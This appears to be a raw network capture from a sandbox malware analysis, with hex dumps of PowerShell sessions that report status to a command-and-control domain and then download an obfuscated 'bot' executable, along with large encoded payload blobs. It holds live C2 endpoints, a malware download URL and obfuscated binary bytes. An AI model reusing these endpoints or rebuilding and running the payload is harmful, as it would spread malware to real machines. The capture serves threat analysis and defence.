                                                                                  2024-11-08 09:41:06 UTC1369INData Raw: 4f 43 5b 33 50 7b 52 6f 43 6a 53 30 57 31 58 54 62 34 64 6c 53 45 50 56 6d 5b 4c 6f 69 72 56 57 69 4b 5b 33 4b 49 4e 56 34 4b 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 73 56 6b 4b 35 65 6d 6d 75 53 6f 4f 51 60 32 43 4f 54 56 79 6e 57 47 65 73 60 46 47 52 57 54 57 6f 54 47 4f 42 50 54 75 45 60 7b 65 44 54 56 38 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 54 34 45 63 6b 43 4e 50 33 30 60 4c 56 4b 75 55 6b 43 69 57 7b 6d 30 52 54 57 4e 64 57 71 59 53 6b 43 60 54 7b 47 46 58 6d 69 42 4c 46 57 56 54 6c 79 68 56 44 4b 57 56 6d 69 6e 4c 47 4b 75 63 49 4f 60 54 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 6b 53 31 5b 34 56 57 62 76 5b 31 75 43 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6c 4b 6b 4c 30 4b 34 58
                                                                                  Data Ascii: OC[3P{RoCjS0W1XTb4dlSEPVm[LoirVWiK[3KINV4K`oONP3mC[1mEPVeKP1GsVkK5emmuSoOQ`2COTVynWGes`FGRWTWoTGOBPTuE`{eDTV8oRTOC[3[SLDuDTV8NP3mC[1mEPT4EckCNP30`LVKuUkCiW{m0RTWNdWqYSkC`T{GFXmiBLFWVTlyhVDKWVminLGKucIO`T1H2SGGw[1mEPVekS1[4VWbv[1uCLDuKP1GoRTOC[1mEPlKkL0K4X
                                                                                  2024-11-08 09:41:06 UTC1369INData Raw: 68 53 30 5b 73 52 54 65 46 65 57 71 45 50 6c 79 68 63 54 5b 71 58 6a 65 56 60 31 53 53 63 33 75 6a 4c 6c 79 30 56 6a 62 34 4c 33 4c 76 54 6c 79 60 63 57 5b 30 56 6a 65 56 64 54 6d 44 4c 46 65 52 4c 6d 58 76 55 47 5b 6a 65 46 47 57 4e 56 6d 69 63 57 5b 70 5b 44 4f 43 65 47 53 75 53 6f 53 60 56 44 34 32 56 57 65 4e 63 44 6d 45 52 6d 4f 68 4c 6b 6a 76 56 44 5b 4e 63 47 6a 7b 57 6f 6d 69 56 47 48 30 54 55 4b 56 65 56 53 49 57 6f 6d 4f 60 54 6d 6f 55 47 57 4e 62 30 6d 58 55 6f 71 4b 50 31 71 42 58 6c 34 52 62 46 53 75 63 49 6d 6a 56 44 34 53 58 33 31 34 60 33 53 59 55 6b 43 4b 60 54 48 35 52 54 5b 6a 63 30 71 58 52 6c 79 4c 57 55 6d 71 58 56 30 56 60 6c 53 45 50 6b 65 4b 50 30 4b 6c 55 46 30 52 62 46 4c 7b 50 6f 4f 5b 56 46 79 51 56 57 62 79 63 44 6d 45 4c 56
                                                                                  Data Ascii: hS0[sRTeFeWqEPlyhcT[qXjeV`1SSc3ujLly0Vjb4L3LvTly`cW[0VjeVdTmDLFeRLmXvUG[jeFGWNVmicW[p[DOCeGSuSoS`VD42VWeNcDmERmOhLkjvVD[NcGj{WomiVGH0TUKVeVSIWomO`TmoUGWNb0mXUoqKP1qBXl4RbFSucImjVD4SX314`3SYUkCK`TH5RT[jc0qXRlyLWUmqXV0V`lSEPkeKP0KlUF0RbFL{PoO[VFyQVWbycDmELV
                                                                                  2024-11-08 09:41:06 UTC1369INData Raw: 4c 57 71 55 63 46 53 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6f 53 37 5b 44 69 4a 62 46 4b 75 5b 46 53 4a 53 56 79 30 58 31 69 56 4c 47 4b 75 63 49 4f 60 57 6a 4b 6e 5b 44 65 6f 62 31 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 54 4b 6e 58 33 30 46 65 47 71 58 54 6c 79 6b 60 56 69 4e 56 57 62 30 60 30 6d 58 54 6f 5b 6b 63 6c 72 34 52 6a 69 52 64 56 53 59 57 59 43 58 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 58 7b 4f 52 64 56 47 59 4f 56 34 58 54 30 4b 50 5b 47 69 52 65 33 53 58 54 6a 65 69 57 32 69 72 57 54 65 46 4c 46 47 45 65 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 56 56 34 72 4c 47 71 56 4c 46 75 59 53 7b 6d 34 54 7b 4b 56 4f 54 6d 44 4c 46 65 4f 54 55 43 4d 52 54 4f
                                                                                  Data Ascii: LWqUcFSDTV8oRTOC[1mEPVeKSoS7[DiJbFKu[FSJSVy0X1iVLGKucIO`WjKn[Deob1SSc14E`TGoRTOC[1mEPVeYLTKnX30FeGqXTlyk`ViNVWb0`0mXTo[kclr4RjiRdVSYWYCXTUCMRTOC[1mEPVeKP1KhX{ORdVGYOV4XT0KP[GiRe3SXTjeiW2irWTeFLFGEe14E[{CMRTOC[1mEPVeKP1KhVV4rLGqVLFuYS{m4T{KVOTmDLFeOTUCMRTO
                                                                                  2024-11-08 09:41:06 UTC517INData Raw: 56 79 50 54 6c 6d 43 60 57 4b 58 52 6f 6d 68 4c 31 6d 6f 58 31 69 4a 65 6d 6a 78 57 6f 71 6b 64 54 6d 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 58 33 30 56 4c 46 53 58 52 6f 57 4b 50 30 4b 75 56 57 65 35 64 6d 71 53 4c 44 75 4b 50 31 47 6f 52 54 66 76 55 6a 4f 74 4c 44 34 45 5b 7b 43 4d 53 47 47 76 63 56 53 59 4f 56 71 6a 53 33 79 33 58 6c 6d 42 53 56 48 7b 5b 49 57 68 53 7b 6d 6e 56 6a 4c 79 53 33 47 59 64 46 79 56 4c 6c 76 76 58 54 5b 4a 63 46 53 48 52 6b 57 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 6f 65 5b 56 44 71 6e 58 6d 4f 43 63 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 65 49 71 6a 52 44 71 76 58 6c 30 6a 5b 44 71 48 57 6f 6d 68 50 32 65 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 7b 4f 4e 4c 46 4f 75 63 49 57 60
                                                                                  Data Ascii: VyPTlmC`WKXRomhL1moX1iJemjxWoqkdTmNP3mC[1mEPVeKP1GoX30VLFSXRoWKP0KuVWe5dmqSLDuKP1GoRTfvUjOtLD4E[{CMSGGvcVSYOVqjS3y3XlmBSVH{[IWhS{mnVjLyS3GYdFyVLlvvXT[JcFSHRkWKRIONP3mC[1mEPoe[VDqnXmOCc1SSc3eKP1GoRTOC[1mFeIqjRDqvXl0j[DqHWomhP2eNP3mC[1mEPVeKP1GoW{ONLFOucIW`
                                                                                  2024-11-08 09:41:06 UTC1369INData Raw: 4b 57 55 6a 4f 71 50 56 65 4b 50 31 47 73 5b 44 65 56 65 46 4f 47 56 6f 43 68 53 30 57 6f 54 47 4f 43 60 57 47 37 62 46 4f 56 4c 6c 79 30 56 6a 62 34 4c 33 4c 79 64 47 57 60 57 7b 47 32 56 44 65 60 62 46 4b 49 57 56 6d 51 65 7b 43 4d 53 47 47 77 5b 31 6d 45 50 56 65 6a 4c 6c 69 76 58 6a 65 57 5b 31 75 45 54 6f 6d 60 56 47 4b 34 5b 57 57 4e 65 6c 53 59 4f 55 43 4b 50 7b 47 7b 5b 44 4f 43 60 33 4b 59 53 6b 53 57 63 57 58 76 58 33 30 72 63 46 4f 34 50 59 53 5b 57 7b 57 73 52 54 4c 79 65 56 48 7b 54 56 65 4a 53 30 4b 33 5b 45 48 30 62 33 48 78 53 6c 75 57 4c 30 5b 70 56 55 4b 56 63 47 71 49 57 6c 75 4d 54 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 69 52 64 56 57 55 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52
                                                                                  Data Ascii: KWUjOqPVeKP1Gs[DeVeFOGVoChS0WoTGOC`WG7bFOVLly0Vjb4L3LydGW`W{G2VDe`bFKIWVmQe{CMSGGw[1mEPVejLlivXjeW[1uETom`VGK4[WWNelSYOUCKP{G{[DOC`3KYSkSWcWXvX30rcFO4PYS[W{WsRTLyeVH{TVeJS0K3[EH0b3HxSluWL0[pVUKVcGqIWluMT1H2SGGw[1mEPVeKP1GoRTiRdVWUPkeDTV8oRTOC[1mEPVeKP1GoR
                                                                                  2024-11-08 09:41:06 UTC1369INData Raw: 57 53 31 58 76 58 54 4f 43 60 33 53 49 57 6f 53 6b 53 57 71 76 58 6a 65 57 5b 31 79 56 50 6c 69 6a 53 33 69 57 5b 57 69 42 63 44 6d 47 64 46 79 5b 57 30 6d 76 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 52 47 4b 46 55 6a 71 52 53 6c 69 54 57 30 54 34 53 31 6d 45 52 6a 57 68 4c 33 53 30 58 6a 62 34 60 47 71 45 50 6c 71 68 4c 6b 47 32 58 6a 65 56 4c 47 71 59 54 55 5b 4b 50 30 48 76 56 6d 62 79 65 30 4b 75 63 49 4f 60 54 31 6a 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 6a 65 52 65 6c 50 78 4f 59 4f 68 4c 6a 5b 73 57 55 4f 56 60 6d 6a 78 57 6c 79 60 53 30 5b 73 52 54 50 76 5b 30 44 78 4e 59 57 6a 63 57 5b 34 5b 44 4c 79 53 33 47 59 64 46
                                                                                  Data Ascii: WS1XvXTOC`3SIWoSkSWqvXjeW[1yVPlijS3iW[WiBcDmGdFy[W0mvRTi{UjOqPVeKP1GoRTOC[1mEPVeKP1GoRTOBRGKFUjqRSliTW0T4S1mERjWhL3S0Xjb4`GqEPlqhLkG2XjeVLGqYTU[KP0HvVmbye0KucIO`T1j2SGGw[1mEPVeKP1GoRTOC[1mEPVeKP1GoRjeRelPxOYOhLj[sWUOV`mjxWly`S0[sRTPv[0DxNYWjcW[4[DLyS3GYdF
                                                                                  2024-11-08 09:41:06 UTC1369INData Raw: 4c 44 6d 49 52 6c 79 60 63 55 6d 34 56 6d 4f 42 64 57 71 58 54 6f 6d 6d 57 33 79 30 56 6f 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 62 47 71 71 50 56 38 4c 57 7b 57 33 5b 44 4f 43 60 30 71 49 4e 55 4f 68 63 59 69 33 56 57 65 52 57 46 53 59 55 6c 71 60 57 30 5b 73 56 6d 65 53 62 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 64 57 71 58 54 6f 6d 6d 57 54 34 33 5b 47 62 30 4c 44 75 34 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 72 63 54 6d 45 5b 33 75 6b 63 57 58 76 58 33 34 72 53 46 48 7b 57 6f 57 6a 50 31 47 31 58 6a 69 53 5b 31 71 49 4c 56 69 6d 53 6a 71 72 5b 44 69 4a 62 47 71 58 55 59 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f
                                                                                  Data Ascii: LDmIRly`cUm4VmOBdWqXTommW3y0VobvR1mEPVeKP1GoRTOBbGqqPV8LW{W3[DOC`0qINUOhcYi3VWeRWFSYUlq`W0[sVmeSbDmHb14E`TGoRTOC[1mEPVeKP1GoRTORdWqXTommWT43[Gb0LDu4b14E`TGoRTOC[1mEPVeKP1GoRTercTmE[3ukcWXvX34rSFH{WoWjP1G1XjiS[1qILVimSjqr[DiJbGqXUYCKRIONP3mC[1mEPVeKP1GoRTO
                                                                                  2024-11-08 09:41:06 UTC1369INData Raw: 54 47 71 54 59 71 76 58 30 58 78 63 49 57 60 53 7b 6a 7b 58 7b 47 35 57 57 71 59 4c 59 65 58 52 44 35 78 56 55 4f 76 52 56 48 7b 55 6b 43 4c 63 57 58 31 56 6d 4f 4b 4f 31 53 53 62 44 69 52 53 6a 34 4a 54 6a 5b 6e 57 47 65 57 4e 54 65 4b 50 31 71 6e 56 6a 65 53 5b 33 53 49 53 6f 71 69 64 54 6a 32 53 47 47 77 60 30 6d 59 55 6b 43 69 57 7b 6d 30 52 54 50 76 5b 30 53 75 57 6b 4f 4c 57 6a 34 70 58 54 65 56 60 33 53 59 64 46 79 60 53 6d 4b 6e 58 7b 4b 31 50 6d 6a 7b 54 6f 43 68 4c 6b 53 6f 55 47 57 56 4f 47 71 59 55 6b 47 6a 53 30 57 6f 52 56 75 4f 4f 6d 69 46 5b 49 43 68 63 57 4b 33 5b 45 4f 4e 58 30 5b 49 57 6f 53 6b 53 6f 69 37 5b 46 30 4e 4f 6d 4f 49 4e 59 71 6a 50 7b 57 72 5b 54 65 57 60 54 6d 45 4c 54 4b 6b 63 56 50 79 58 6d 65 56 65 56 53 45 50 56 6d 5b
                                                                                  Data Ascii: TGqTYqvX0XxcIW`S{j{X{G5WWqYLYeXRD5xVUOvRVH{UkCLcWX1VmOKO1SSbDiRSj4JTj[nWGeWNTeKP1qnVjeS[3SISoqidTj2SGGw`0mYUkCiW{m0RTPv[0SuWkOLWj4pXTeV`3SYdFy`SmKnX{K1Pmj{ToChLkSoUGWVOGqYUkGjS0WoRVuOOmiF[IChcWK3[EONX0[IWoSkSoi7[F0NOmOINYqjP{Wr[TeW`TmELTKkcVPyXmeVeVSEPVm[
                                                                                  2024-11-08 09:41:06 UTC1369INData Raw: 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 65 6a 62 33 48 78 52 6c 69 68 53 49 43 4d 57 44 57 4a 56 57 54 79 62 44 6d 59 60 30 5b 42 52 54 50 76 5b 30 47 45 5b 32 43 51 65 7b 43 4d 53 47 47 76 63 56 53 59 4f 56 71 6a 53 33 79 33 58 6c 6d 42 50 6d 5b 57 56 6a 5b 55 57 55 57 4d 54 31 57 46 53 6a 53 53 62 45 65 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 60 46 79 5b 57 30 4b 72 58 33 34 4f 5b 30 43 55 50 6a 47 6d 4c 7b 40 32 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 32 53 72 5b 57 4f 43 4e 54 6d 45 52 6a 53 68 4c 6b 54 76 56 6d 62 30 4c 44 79 56 54 6b 57 6b 53 30 57 71 55 32 62 76 52 31 6d 45
                                                                                  Data Ascii: dl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#Rjejb3HxRlihSICMWDWJVWTybDmY`0[BRTPv[0GE[2CQe{CMSGGvcVSYOVqjS3y3XlmBPm[WVj[UWUWMT1WFSjSSbEeDTV8oRTOC[1qI`Fy[W0KrX34O[0CUPjGmL{@2SGGw[1mEPVeJS2Sr[WOCNTmERjShLkTvVmb0LDyVTkWkS0WqU2bvR1mE


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.11.2049728104.21.86.2194433372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:06 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 140
                                                                                  2024-11-08 09:41:06 UTC140OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 41 72 74 68 75 72 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                  Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
                                                                                  2024-11-08 09:41:07 UTC949INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:07 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G01HC4JxhxCZ1rPNNcljGW%2Frdt%2ByTgTfEoV%2F1iDTTzNXV9FaxVE%2BbncZ40%2BttWokRkxr4qJiOKslGfpieHj0C2OyV1E5XW3fN61k7J6XAc4%2F8WjiC5KxzHPMDXjo6mj1X1JIms2q5kRu"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10224&sent=11209&recv=5237&lost=0&retrans=0&sent_bytes=15878198&recv_bytes=9366&delivery_rate=10138888&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49afdea7843ca-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102167&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1090&delivery_rate=37440&cwnd=252&unsent_bytes=0&cid=8281d35df169fa85&ts=824&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.11.2049731104.21.86.2194433372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:18 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 69
                                                                                  2024-11-08 09:41:18 UTC69OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                  Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
                                                                                  2024-11-08 09:41:19 UTC947INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:19 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wRLbEP5WAuUkTW%2BDgcJfOSrKI9N2mpJyJlmpcOv0ftVq9qbctgylLlPF59hbGugqEsRVKe%2B1xWZigu5ZeExsMFZHQEA09DKS8%2BJqWEC3SIq8y1Ui4hXg5WF9znA%2BOVypL%2B1fPdJxTT9v"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=33194&sent=11261&recv=5277&lost=0&retrans=0&sent_bytes=15915090&recv_bytes=21238&delivery_rate=12814042&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49b48b9c56351-ORD
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=122286&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1018&delivery_rate=31250&cwnd=51&unsent_bytes=0&cid=c3c5f74cf2281375&ts=895&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.11.2049732104.21.86.2194433372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:19 UTC338OUTGET /file2/30bb492ec87899a2b4a8fa5c9eeec469e8a8f676c6e21bae43b153c3c581617ac552ec76819a08497356d4a4c1300c247665707c23d7ea2e5505405a37bf7431b8ca2fa35ffb67331141bd33177e82cf02229073ebb7c61d4ae688cf4c9aa3e8 HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  2024-11-08 09:41:20 UTC1042INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:20 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 8351232
                                                                                  Connection: close
                                                                                  content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OFUPOaULcj9RZTI98G2tvvyMZs0V%2Fa3EsFuw3yG1fVzm9GW5iGaYbVT%2BReQSAEh3EI5O2KN7ltEDnev%2FFGcrIPeOlquv%2BLuV7LZEm5ukKBLlrhmbPxa%2BuKhvkl8gyDtwwHOzN6vmeJag"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=943&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49b4f9fd70c7a-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102127&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=976&delivery_rate=37489&cwnd=239&unsent_bytes=0&cid=54149c91b0682877&ts=834&x=0"
                                                                                  2024-11-08 09:41:20 UTC327INData Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01 23
                                                                                  Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef#
                                                                                  2024-11-08 09:41:20 UTC1369INData Raw: 80 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 01 01 11 01 01 01 11 29 90 01 59 01 01 01 69 29 90 01 55 00 01 01 01 41 99 01 8b 04 01 01 01 71 92 01 45 ce 05 01 01 01 01 01 01 01 01 01 01 51 99 01 cd 11 01 01 31 8f 87 01 1d 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 91 87 01 29 01 01 01 f1 8d 87 01 41 00 01 01 01 01 01 01 01 01 01 01 01 11 5e 01 01 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 2f 75 64 79 75 01 01 01 79 26 0d 01 01 11 01 01 01 29 0d 01 01 05 01 01 01 01 01 01 01 01 01 01 01 01 01 01 21 01 01 61 2f 6c 60 6f 60 66 64 65 09 ab 3a 01 01 41 0d 01 01 ad 3a 01 01 2d 0d 01 01 01 01 01 01 01 01 01 01 01 01 01 21 01 01 61 69 78 65 73 60 75
                                                                                  Data Ascii: )Yi)UAqEQ1)A^/udyuy&)!a/l`o`fde:A:-!aixes`u
                                                                                  2024-11-08 09:41:20 UTC1369INData Raw: 4f 01 49 8c 0c f6 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 69 d5 25 01 49 8c 04 20 d6 4f 01 49 8c 0c 13 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4a d5 25 01 49 8c 04 1d d6 4f 01 49 8c 0c 0c d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2f d5 25 01 49 8c 04 26 d6 4f 01 49 8c 0c 19 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 10 d5 25 01 49 8c 04 8b d6 4f 01 49 8c 0c 7a d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f5 d2 25 01 49 8c 04 9c d6 4f 01 49 8c 0c 8f d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d6 d2 25 01 49 8c 04 a9 d6 4f 01 49 8c 0c 98 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bb d2 25 01 49 8c 04 da d6 4f 01 49 8c 0c cd d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 9c d2 25 01 49 8c 04 df d6 4f 01 49 8c 0c ce d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 81 d2 25
                                                                                  Data Ascii: OIOI8tIi%I OIOI8tIJ%IOIOI8tI/%I&OIOI8tI%IOIzOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%
                                                                                  2024-11-08 09:41:20 UTC1369INData Raw: db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 ce 25 01 49 8c 04 2f db 4f 01 49 8c 0c 1e db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 cf 25 01 49 8c 04 20 db 4f 01 49 8c 0c 13 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da cf 25 01 49 8c 04 15 db 4f 01 49 8c 0c 04 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf cf 25 01 49 8c 04 16 db 4f 01 49 8c 0c 09 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 cf 25 01 49 8c 04 5b db 4f 01 49 8c 0c 4a db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 cf 25 01 49 8c 04 4c db 4f 01 49 8c 0c 3f db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 66 cf 25 01 49 8c 04 71 db 4f 01 49 8c 0c 60 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b cf 25 01 49 8c 04 92 db 4f 01 49 8c 0c 85 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2c cf 25 01 49 8c 04 87 db
                                                                                  Data Ascii: OI8tI%I/OIOI8tI%I OIOI8tI%IOIOI8tI%IOIOI8tI%I[OIJOI8tI%ILOI?OI8tIf%IqOI`OI8tIK%IOIOI8tI,%I
